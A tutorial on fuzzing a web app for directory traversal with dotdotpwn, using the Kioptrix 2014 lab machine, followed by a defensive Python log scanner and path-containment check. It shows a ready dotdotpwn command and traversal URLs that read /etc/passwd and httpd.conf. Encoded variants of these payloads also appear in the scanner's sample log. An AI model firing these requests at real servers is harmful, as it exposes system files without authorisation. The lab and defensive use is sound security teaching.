Exploiting potential directory traversals with the fuzzing tool dotdotpwn.

So you have researched your web app and found that it may be vulnerable to directory traversal attacks. Very often the path to the initial point of the directory traversal is given in the exploit guide. If it isn't, however, you can use the dotdotpwn script to search for a potential directory traversal.

For example:

cd /usr/share/dotdotpwn
dotdotpwn -m http-url -u http://(IPorDomainName)/examples/index.php?Action=View\&Script=/TRAVERSAL -k "root:" -o unix


-m sets the module to be http-url.

-u gives the URL to be tested. The word TRAVERSAL marks the point in the URL where dotdotpwn inserts its traversal payloads.

-k "root:" searches each response for the string "root:", the start of the root entry in /etc/passwd, so a hit confirms the file was actually read.

-o sets the operating system to unix; this information should be available from the Nmap scan of the target.

Running this will cause dotdotpwn to fuzz through a number of traversal patterns to find paths that can be traversed to. For example:

http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../usr/local/etc/apache22/httpd.conf

http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../etc/passwd
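From the defender's side, the requests above are easy to spot in the web server's access log once the payloads are decoded, and the application fix is a resolver that refuses any Script value escaping its base directory. The following is an added example, not code from the original post or from dotdotpwn or pChart: the log lines, client addresses and the base directory /srv/pchart/examples are constructed for illustration, and safe_resolve is an assumed shape for the missing check, not the project's own patch.

```python
"""Added example: detect traversal attempts in access logs and show the
path check a fix for the vulnerable parameter needs. All sample data is
constructed; nothing here is taken from a real capture."""
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-log lines: four fuzzing variants plus one benign request.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=/../etc/passwd HTTP/1.1" 200 1532 "-" "DotDotPwn"
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1532 "-" "DotDotPwn"
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252e%252e/etc/passwd HTTP/1.1" 404 221 "-" "DotDotPwn"
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=....//....//etc/passwd HTTP/1.1" 200 1532 "-" "DotDotPwn"
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=Example01.php HTTP/1.1" 200 4811 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding. Double encoding such as
    %252e is a common evasion, so one unquote() is not enough."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(value: str) -> bool:
    """Heuristic tuned for recall: after decoding and folding backslashes,
    flag any '..' that is followed by a separator or ends the value. This
    also catches the '....//' filter-bypass spelling."""
    normalised = fully_decode(value).replace("\\", "/")
    return re.search(r"\.\.(/|$)", normalised) is not None


def scan_log(text: str) -> list:
    """Return one finding per log line whose request path or any query
    parameter carries a traversal sequence."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        suspects = [("path", parts.path)]
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            suspects.extend((name, v) for v in values)
        for where, val in suspects:
            if has_traversal(val):
                findings.append({"line": lineno, "client": line.split()[0],
                                 "param": where, "value": val})
                break
    return findings


def safe_resolve(base_dir: str, requested: str):
    """Resolve a user-supplied script name inside base_dir and return the
    absolute path only if it stays under base_dir, otherwise None. This is
    the containment check the vulnerable Script parameter lacks (assumed
    fix shape, not pChart's own code)."""
    base = os.path.realpath(base_dir)
    relative = fully_decode(requested).replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(base, relative))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} traversal in "
              f"{hit['param']}={hit['value']!r}")
    print(safe_resolve("/srv/pchart/examples", "/../etc/passwd"))
    print(safe_resolve("/srv/pchart/examples", "Example01.php"))
```

Alerting on the decoded value rather than the raw query string is the point: the second and third sample lines would slip past a literal "../" match. On the application side, realpath() is what makes the check hold, since it normalises the "....//" spelling to a harmless directory name instead of relying on stripping "../" substrings.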


The examples above can be found by attacking the Kioptrix 2014 vulnerable machine on vulnhub.

For further information on dotdotpwn:

https://github.com/wireghoul/dotdotpwn

or run the following command in the terminal for the help menu:

perl dotdotpwn.pl -h
